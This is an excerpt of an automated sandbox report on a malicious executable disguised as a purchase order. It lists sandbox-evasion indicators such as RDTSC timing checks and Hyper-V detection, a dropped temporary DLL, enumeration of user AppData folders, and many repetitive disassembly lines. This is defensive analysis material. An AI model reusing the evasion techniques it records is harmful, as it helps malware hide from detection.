      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe API/Special instruction interceptor: Address: 477F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe API/Special instruction interceptor: Address: 334F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe RDTSC instruction interceptor: First address: 4743B9E second address: 4743B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC4758BE106h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe RDTSC instruction interceptor: First address: 3313B9E second address: 3313B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC474D025D6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_3489D1C0 rdtsc 11_2_3489D1C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dll
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe API coverage: 0.3 %
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 5_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_004065FD FindFirstFileW,FindClose, 5_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_00402868 FindFirstFileW, 5_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File opened: C:\Users\user
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File opened: C:\Users\user\AppData
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668967160.00000000046DD000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322679652.00000000046DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe API call chain: ExitProcess graph end node graph_5-4362
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe API call chain: ExitProcess graph end node graph_5-4366
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_0040264A MultiByteToWideChar,ReadFile,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer, 5_2_0040264A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 5_2_73CF1B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 5_2_73CF1B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_34829486 mov eax, dword ptr fs:[00000030h] 11_2_34829486
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348174B0 mov eax, dword ptr fs:[00000030h] 11_2_348174B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348534B0 mov eax, dword ptr fs:[00000030h] 11_2_348534B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348F54DB mov eax, dword ptr fs:[00000030h] 11_2_348F54DB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348C94E0 mov eax, dword ptr fs:[00000030h] 11_2_348C94E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_3484340D mov eax, dword ptr fs:[00000030h] 11_2_3484340D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348A7410 mov eax, dword ptr fs:[00000030h] 11_2_348A7410
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348CB450 mov eax, dword ptr fs:[00000030h] 11_2_348CB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348DF453 mov eax, dword ptr fs:[00000030h] 11_2_348DF453
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_34821460 mov eax, dword ptr fs:[00000030h] 11_2_34821460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_3483F460 mov eax, dword ptr fs:[00000030h] 11_2_3483F460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348F547F mov eax, dword ptr fs:[00000030h] 11_2_348F547F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_3481758F mov eax, dword ptr fs:[00000030h] 11_2_3481758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348AB594 mov eax, dword ptr fs:[00000030h] 11_2_348AB594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348415A9 mov eax, dword ptr fs:[00000030h] 11_2_348415A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348B35BA mov eax, dword ptr fs:[00000030h] 11_2_348B35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe Code function: 11_2_348DF5BE mov eax, dword ptr fs:[00000030h] 11_2_348DF5BE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484F5B0 mov eax, dword ptr fs:[00000030h]11_2_3484F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348BD5B0 mov eax, dword ptr fs:[00000030h]11_2_348BD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348BD5B0 mov eax, dword ptr fs:[00000030h]11_2_348BD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348555C0 mov eax, dword ptr fs:[00000030h]11_2_348555C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F55C9 mov eax, dword ptr fs:[00000030h]11_2_348F55C9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F35D7 mov eax, dword ptr fs:[00000030h]11_2_348F35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F35D7 mov eax, dword ptr fs:[00000030h]11_2_348F35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F35D7 mov eax, dword ptr fs:[00000030h]11_2_348F35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D5D0 mov eax, dword ptr fs:[00000030h]11_2_3489D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D5D0 mov ecx, dword ptr fs:[00000030h]11_2_3489D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348495DA mov eax, dword ptr fs:[00000030h]11_2_348495DA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348415F4 mov eax, dword ptr fs:[00000030h]11_2_348415F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34857505 mov eax, dword ptr fs:[00000030h]11_2_34857505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34857505 mov ecx, dword ptr fs:[00000030h]11_2_34857505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DB52F mov eax, dword ptr fs:[00000030h]11_2_348DB52F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485D530 mov eax, dword ptr fs:[00000030h]11_2_3485D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485D530 mov eax, dword ptr fs:[00000030h]11_2_3485D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D534 mov eax, dword ptr fs:[00000030h]11_2_3482D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5537 mov eax, dword ptr fs:[00000030h]11_2_348F5537
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB550 mov eax, dword ptr fs:[00000030h]11_2_348CB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB550 mov eax, dword ptr fs:[00000030h]11_2_348CB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB550 mov eax, dword ptr fs:[00000030h]11_2_348CB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485B570 mov eax, dword ptr fs:[00000030h]11_2_3485B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485B570 mov eax, dword ptr fs:[00000030h]11_2_3485B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D6AA mov eax, dword ptr fs:[00000030h]11_2_3481D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481D6AA mov eax, dword ptr fs:[00000030h]11_2_3481D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348176B2 mov eax, dword ptr fs:[00000030h]11_2_348176B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348176B2 mov eax, dword ptr fs:[00000030h]11_2_348176B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348176B2 mov eax, dword ptr fs:[00000030h]11_2_348176B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482B6C0 mov eax, dword ptr fs:[00000030h]11_2_3482B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E16CC mov eax, dword ptr fs:[00000030h]11_2_348E16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348516CF mov eax, dword ptr fs:[00000030h]11_2_348516CF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF6C7 mov eax, dword ptr fs:[00000030h]11_2_348DF6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D6E0 mov eax, dword ptr fs:[00000030h]11_2_3484D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D6E0 mov eax, dword ptr fs:[00000030h]11_2_3484D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348536EF mov eax, dword ptr fs:[00000030h]11_2_348536EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DD6F0 mov eax, dword ptr fs:[00000030h]11_2_348DD6F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34851607 mov eax, dword ptr fs:[00000030h]11_2_34851607
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485F603 mov eax, dword ptr fs:[00000030h]11_2_3485F603
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823616 mov eax, dword ptr fs:[00000030h]11_2_34823616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823616 mov eax, dword ptr fs:[00000030h]11_2_34823616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F626 mov eax, dword ptr fs:[00000030h]11_2_3481F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F5636 mov eax, dword ptr fs:[00000030h]11_2_348F5636
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34859660 mov eax, dword ptr fs:[00000030h]11_2_34859660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34859660 mov eax, dword ptr fs:[00000030h]11_2_34859660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348BD660 mov eax, dword ptr fs:[00000030h]11_2_348BD660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF78A mov eax, dword ptr fs:[00000030h]11_2_348DF78A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A97A9 mov eax, dword ptr fs:[00000030h]11_2_348A97A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AF7AF mov eax, dword ptr fs:[00000030h]11_2_348AF7AF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484D7B0 mov eax, dword ptr fs:[00000030h]11_2_3484D7B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F37B6 mov eax, dword ptr fs:[00000030h]11_2_348F37B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3481F7BA mov eax, dword ptr fs:[00000030h]11_2_3481F7BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348257C0 mov eax, dword ptr fs:[00000030h]11_2_348257C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348257C0 mov eax, dword ptr fs:[00000030h]11_2_348257C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348257C0 mov eax, dword ptr fs:[00000030h]11_2_348257C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482D7E0 mov ecx, dword ptr fs:[00000030h]11_2_3482D7E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348217EC mov eax, dword ptr fs:[00000030h]11_2_348217EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348217EC mov eax, dword ptr fs:[00000030h]11_2_348217EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348217EC mov eax, dword ptr fs:[00000030h]11_2_348217EC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34825702 mov eax, dword ptr fs:[00000030h]11_2_34825702
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34825702 mov eax, dword ptr fs:[00000030h]11_2_34825702
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34827703 mov eax, dword ptr fs:[00000030h]11_2_34827703
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485F71F mov eax, dword ptr fs:[00000030h]11_2_3485F71F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485F71F mov eax, dword ptr fs:[00000030h]11_2_3485F71F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34823720 mov eax, dword ptr fs:[00000030h]11_2_34823720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F720 mov eax, dword ptr fs:[00000030h]11_2_3483F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F720 mov eax, dword ptr fs:[00000030h]11_2_3483F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483F720 mov eax, dword ptr fs:[00000030h]11_2_3483F720
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF72E mov eax, dword ptr fs:[00000030h]11_2_348DF72E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E972B mov eax, dword ptr fs:[00000030h]11_2_348E972B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819730 mov eax, dword ptr fs:[00000030h]11_2_34819730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34819730 mov eax, dword ptr fs:[00000030h]11_2_34819730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34855734 mov eax, dword ptr fs:[00000030h]11_2_34855734
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348FB73C mov eax, dword ptr fs:[00000030h]11_2_348FB73C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov ecx, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483B730 mov eax, dword ptr fs:[00000030h]11_2_3483B730
